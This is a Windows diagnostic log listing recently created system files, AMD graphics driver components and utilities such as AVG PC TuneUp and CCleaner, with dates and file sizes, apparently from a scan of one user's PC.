2016-04-15 17:10 - 2016-03-16 06:47 - 22610328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-04-15 17:10 - 2016-03-16 06:47 - 03622272 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-04-15 17:10 - 2016-03-16 06:47 - 00801632 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe
2016-04-15 17:10 - 2016-03-16 06:46 - 00658568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2016-04-15 17:10 - 2016-03-16 06:45 - 00140536 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthHost.exe
2016-04-15 17:10 - 2016-03-16 06:41 - 00607416 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2016-04-15 17:10 - 2016-03-16 06:41 - 00208736 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2016-04-15 17:10 - 2016-03-16 06:39 - 00983904 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-04-15 17:10 - 2016-03-16 06:37 - 01010016 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2016-04-15 17:10 - 2016-03-16 06:21 - 01767000 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-04-15 17:10 - 2016-03-16 06:21 - 01531888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll
2016-04-15 17:10 - 2016-03-16 06:11 - 21088728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-04-15 17:10 - 2016-03-16 06:11 - 02879024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-04-15 17:10 - 2016-03-16 06:11 - 00700256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe
2016-04-15 17:10 - 2016-03-16 06:08 - 00151552 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2016-04-15 17:10 - 2016-03-16 06:06 - 00181088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2016-04-15 17:10 - 2016-03-16 06:05 - 00539728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2016-04-15 17:10 - 2016-03-16 06:03 - 00911360 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-04-15 17:10 - 2016-03-16 06:03 - 00076800 _____ (Microsoft Corporation) C:\WINDOWS\system32\browserbroker.dll
2016-04-15 17:10 - 2016-03-16 06:00 - 21859840 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2016-04-15 17:10 - 2016-03-16 05:56 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhoneCallHistoryApis.dll
2016-04-15 17:10 - 2016-03-16 05:56 - 00194048 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModelShim.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataAccountApis.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00243200 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00183296 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwbase.dll
2016-04-15 17:10 - 2016-03-16 05:55 - 00023552 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExtrasXmlParser.dll
2016-04-15 17:10 - 2016-03-16 05:51 - 00348672 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2016-04-15 17:10 - 2016-03-16 05:51 - 00334848 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2016-04-15 17:10 - 2016-03-16 05:49 - 01416192 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsasrv.dll
2016-04-15 17:10 - 2016-03-16 05:49 - 00850432 _____ (Microsoft Corporation) C:\WINDOWS\system32\samsrv.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00856576 _____ (Microsoft Corporation) C:\WINDOWS\system32\MPSSVC.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00511488 _____ (Microsoft Corporation) C:\WINDOWS\system32\FirewallAPI.dll
2016-04-15 17:10 - 2016-03-16 05:47 - 00025600 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfapigp.dll
2016-04-15 17:10 - 2016-03-16 05:46 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwpolicyiomgr.dll
2016-04-15 17:10 - 2016-03-16 05:44 - 01016832 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2016-04-15 17:10 - 2016-03-16 05:43 - 00573952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Cortana.Desktop.dll
2016-04-15 17:10 - 2016-03-16 05:43 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 02180608 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 01290240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-04-15 17:10 - 2016-03-16 05:42 - 00181760 _____ (Microsoft Corporation) C:\WINDOWS\system32\shutdownux.dll
2016-04-15 17:10 - 2016-03-16 05:41 - 00950272 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00931840 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00324096 _____ (Microsoft Corporation) C:\WINDOWS\system32\profsvc.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00322048 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultsvc.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00280576 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00214528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Scanners.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00158208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSip.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00135168 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2016-04-15 17:10 - 2016-03-16 05:40 - 00095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\samlib.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 03363328 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 00414208 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2016-04-15 17:10 - 2016-03-16 05:39 - 00081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxSysprep.dll
2016-04-15 17:10 - 2016-03-16 05:38 - 01423872 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataService.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 01521664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00856576 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00752640 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00685568 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00288256 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenance.dll
2016-04-15 17:10 - 2016-03-16 05:37 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 01205248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00720896 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExSMime.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00255488 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00244736 _____ (Microsoft Corporation) C:\WINDOWS\system32\cemapi.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00195072 _____ (Microsoft Corporation) C:\WINDOWS\system32\VCardParser.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\CallHistoryClient.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpninprc.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00070656 _____ (Microsoft Corporation) C:\WINDOWS\system32\POSyncServices.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00068608 _____ (Microsoft Corporation) C:\WINDOWS\system32\PimIndexMaintenanceClient.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00066560 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataPlatformHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTypeHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:36 - 00045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataLanguageUtil.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 01794560 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00607744 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxApplicabilityEngine.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-04-15 17:10 - 2016-03-16 05:35 - 00145408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dssvc.dll
2016-04-15 17:10 - 2016-03-16 05:34 - 01871872 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2016-04-15 17:10 - 2016-03-16 05:33 - 00670208 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2016-04-15 17:10 - 2016-03-16 05:32 - 00065024 _____ (Microsoft Corporation) C:\WINDOWS\system32\basesrv.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00195584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataAccountApis.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00172032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhoneCallHistoryApis.dll
2016-04-15 17:10 - 2016-03-16 05:31 - 00018944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExtrasXmlParser.dll
2016-04-15 17:10 - 2016-03-16 05:28 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwbase.dll
2016-04-15 17:10 - 2016-03-16 05:27 - 00161792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\FirewallAPI.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwpolicyiomgr.dll
2016-04-15 17:10 - 2016-03-16 05:24 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wfapigp.dll
2016-04-15 17:10 - 2016-03-16 05:21 - 18796544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2016-04-15 17:10 - 2016-03-16 05:20 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-04-15 17:10 - 2016-03-16 05:18 - 00768000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2016-04-15 17:10 - 2016-03-16 05:18 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AuthBroker.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 03680256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00842240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vaultcli.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00168448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Scanners.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00133120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxSip.dll
2016-04-15 17:10 - 2016-03-16 05:17 - 00060928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\samlib.dll
2016-04-15 17:10 - 2016-03-16 05:16 - 00311808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00625152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00579584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-04-15 17:10 - 2016-03-16 05:14 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00928256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00525312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EmailApis.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExSMime.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00202240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\deviceaccess.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cemapi.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00150528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VCardParser.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00131072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CallHistoryClient.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00056320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\POSyncServices.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00055808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataPlatformHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PimIndexMaintenanceClient.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTypeHelperUtil.dll
2016-04-15 17:10 - 2016-03-16 05:13 - 00037888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataLanguageUtil.dll
2016-04-15 17:10 - 2016-03-16 05:12 - 00195584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2016-04-15 17:10 - 2016-03-16 05:11 - 01594368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2016-04-15 17:10 - 2016-03-16 05:10 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2016-04-15 16:58 - 2016-04-15 16:58 - 00000000 ____D C:\ProgramData\FwinpF
2016-04-12 16:42 - 2016-04-12 16:42 - 00194320 _____ (Intel Corporation) C:\WINDOWS\system32\Drivers\TeeDriverW8x64.sys
2016-04-11 20:03 - 2016-04-11 23:21 - 00002278 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
2016-04-11 20:03 - 2016-04-11 20:03 - 00000870 _____ C:\Users\Public\Desktop\CCleaner.lnk
2016-04-11 20:03 - 2016-04-11 20:03 - 00000000 ____D C:\Program Files\CCleaner
2016-04-11 15:49 - 2016-04-11 15:49 - 00002904 _____ C:\WINDOWS\System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance
2016-04-11 13:27 - 2016-04-11 13:27 - 00001299 _____ C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\AMD Radeon Settings.lnk
2016-04-10 22:05 - 2016-04-10 22:05 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Settings
2016-04-10 21:55 - 2016-04-11 19:59 - 00000000 ____D C:\Users\Harun\AppData\Roaming\PlaysTV
2016-04-10 21:55 - 2016-04-10 21:55 - 00002099 _____ C:\Users\Public\Desktop\Raptr.lnk
2016-04-10 21:55 - 2016-04-10 21:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Raptr
2016-04-10 21:55 - 2016-04-10 21:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Gaming Evolved
2016-04-10 21:54 - 2016-04-11 19:59 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Raptr
2016-04-10 17:33 - 2016-04-11 15:26 - 00000000 ____D C:\ProgramData\Xfire
2016-04-10 17:33 - 2016-04-11 13:32 - 00000000 ____D C:\Users\Harun\AppData\Roaming\Xfire
2016-04-10 17:32 - 2016-04-10 17:32 - 00002217 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG PC TuneUp.lnk
2016-04-10 17:32 - 2016-04-10 17:32 - 00002205 _____ C:\Users\Public\Desktop\AVG PC TuneUp.lnk
2016-04-10 17:32 - 2016-03-29 12:06 - 00053008 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\TURegOpt.exe
2016-04-10 17:32 - 2016-03-29 11:53 - 00044304 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\authuitu.dll
2016-04-10 17:32 - 2016-03-29 11:53 - 00039696 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\SysWOW64\authuitu.dll
2016-04-10 17:31 - 2016-04-19 12:43 - 00000000 ____D C:\Users\Harun\AppData\Local\Avg
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\Users\Harun\AppData\Local\AvgSetupLog
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\ProgramData\Avg
2016-04-10 17:31 - 2016-04-10 17:32 - 00000000 ____D C:\Program Files (x86)\AVG
2016-04-05 09:41 - 2016-04-05 09:41 - 00874000 _____ (AMD) C:\WINDOWS\system32\SETAA8A.tmp
2016-04-05 09:41 - 2016-04-04 04:25 - 00865280 _____ (AMD) C:\WINDOWS\system32\coinst_16.15.dll
2016-04-05 08:47 - 2016-04-05 08:47 - 00365824 _____ C:\WINDOWS\system32\ativvaxy_el_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00322612 _____ C:\WINDOWS\system32\ativvaxy_vi.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00320944 _____ C:\WINDOWS\system32\ativvaxy_vi_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00264736 _____ C:\WINDOWS\system32\ativvaxy_stn_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00260640 _____ C:\WINDOWS\system32\ativvaxy_cz_nd.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00254804 _____ C:\WINDOWS\system32\ativvaxy_FJ.dat
2016-04-05 08:47 - 2016-04-05 08:47 - 00251856 _____ C:\WINDOWS\system32\ativvaxy_FJ_nd.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00857576 _____ C:\WINDOWS\system32\amdicdxx.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00234292 _____ C:\WINDOWS\system32\ativvaxy_cik.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00232496 _____ C:\WINDOWS\system32\ativvaxy_cik_nd.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00177280 _____ C:\WINDOWS\system32\ativce03.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00175584 _____ C:\WINDOWS\system32\amde31a.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00166624 _____ C:\WINDOWS\system32\amde34b.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00166624 _____ C:\WINDOWS\system32\amde34a.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00100832 _____ C:\WINDOWS\system32\ativce02.dat
2016-04-05 08:46 - 2016-04-05 08:46 - 00009184 _____ C:\WINDOWS\system32\AMDKernelEvents.man
2016-04-05 08:46 - 2016-04-05 08:46 - 00000144 _____ C:\WINDOWS\SysWOW64\amd-vulkan32.json
2016-04-05 08:46 - 2016-04-05 08:46 - 00000144 _____ C:\WINDOWS\system32\amd-vulkan64.json
2016-04-04 06:16 - 2016-04-04 06:16 - 00458472 _____ C:\WINDOWS\system32\amdmiracast.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00141792 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00128384 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00110880 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00078432 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00078432 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00071704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2016-04-04 06:16 - 2016-04-04 06:16 - 00071704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2016-04-04 06:12 - 2016-04-04 06:12 - 00296648 _____ (Advanced Micro Devices) C:\WINDOWS\system32\Drivers\amdacpksd.sys
2016-04-04 05:32 - 2016-04-04 05:32 - 00701440 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2016-04-04 05:30 - 2016-04-04 05:30 - 00580096 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2016-04-04 05:29 - 2016-04-04 05:29 - 00127488 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2016-04-04 05:28 - 2016-04-04 05:28 - 06884864 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmantle64.dll
2016-04-04 05:28 - 2016-04-04 05:28 - 00113664 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2016-04-04 05:27 - 2016-04-04 05:27 - 00235008 _____ C:\WINDOWS\system32\clinfo.exe
2016-04-04 05:26 - 2016-04-04 05:26 - 48211968 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl64.dll
2016-04-04 05:21 - 2016-04-04 05:21 - 00065024 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.dll
2016-04-04 05:21 - 2016-04-04 05:21 - 00059392 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.dll
2016-04-04 05:15 - 2016-04-04 05:15 - 26887168 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\amdocl12cl64.dll
2016-04-04 05:11 - 2016-04-04 05:11 - 06956032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2016-04-04 05:02 - 2016-04-04 05:02 - 05398016 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmantle32.dll
2016-04-04 05:00 - 2016-04-04 05:00 - 05420032 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2016-04-04 04:48 - 2016-04-04 04:48 - 00134656 _____ C:\WINDOWS\system32\amdhdl64.dll
2016-04-04 04:48 - 2016-04-04 04:48 - 00123392 _____ C:\WINDOWS\SysWOW64\amdhdl32.dll
2016-04-04 04:47 - 2016-04-04 04:47 - 30377984 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atio6axx.dll
2016-04-04 04:41 - 2016-04-04 04:41 - 00698016 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2016-04-04 04:41 - 2016-04-04 04:41 - 00698016 _____ C:\WINDOWS\system32\atiapfxx.blb
2016-04-04 04:41 - 2016-04-04 04:41 - 00097280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2016-04-04 04:41 - 2016-04-04 04:41 - 00089600 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2016-04-04 04:37 - 2016-04-04 04:37 - 08473088 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2016-04-04 04:25 - 2016-04-04 04:25 - 25069056 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atioglxx.dll
2016-04-04 04:22 - 2016-04-04 04:22 - 06667776 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00367104 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2016-04-04 04:14 - 2016-04-04 04:14 - 00062464 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalrt64.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00055808 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticalcl64.dll
2016-04-04 04:14 - 2016-04-04 04:14 - 00052224 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalrt.dll
2016-04-04 04:13 - 2016-04-04 04:13 - 15711744 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\system32\aticaldd64.dll
2016-04-04 04:13 - 2016-04-04 04:13 - 00049152 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticalcl.dll
2016-04-04 04:10 - 2016-04-04 04:10 - 14302208 _____ (Advanced Micro Devices Inc.) C:\WINDOWS\SysWOW64\aticaldd.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00564736 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00224256 _____ C:\WINDOWS\system32\dgtrayicon.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00209920 _____ C:\WINDOWS\system32\GameManager64.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00204800 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00189952 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00186368 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2016-04-04 03:57 - 2016-04-04 03:57 - 00162304 _____ C:\WINDOWS\system32\atieah64.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00145408 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2016-04-04 03:57 - 2016-04-04 03:57 - 00078336 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2016-04-04 03:56 - 2016-04-04 03:56 - 00251392 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2016-04-04 03:55 - 2016-04-04 03:55 - 00190976 _____ (AMD) C:\WINDOWS\system32\atitmm64.dll
2016-04-04 03:55 - 2016-04-04 03:55 - 00050688 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmmcl6.dll
2016-04-04 03:55 - 2016-04-04 03:55 - 00039424 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmmcl.dll
2016-04-04 03:52 - 2016-04-04 03:52 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2016-04-04 03:42 - 2016-04-04 03:42 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2016-04-04 03:34 - 2016-04-04 03:34 - 00089088 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2016-04-04 03:34 - 2016-04-04 03:34 - 00080896 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00944640 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00157696 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2016-04-04 03:32 - 2016-04-04 03:32 - 00075776 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6pxx.dll
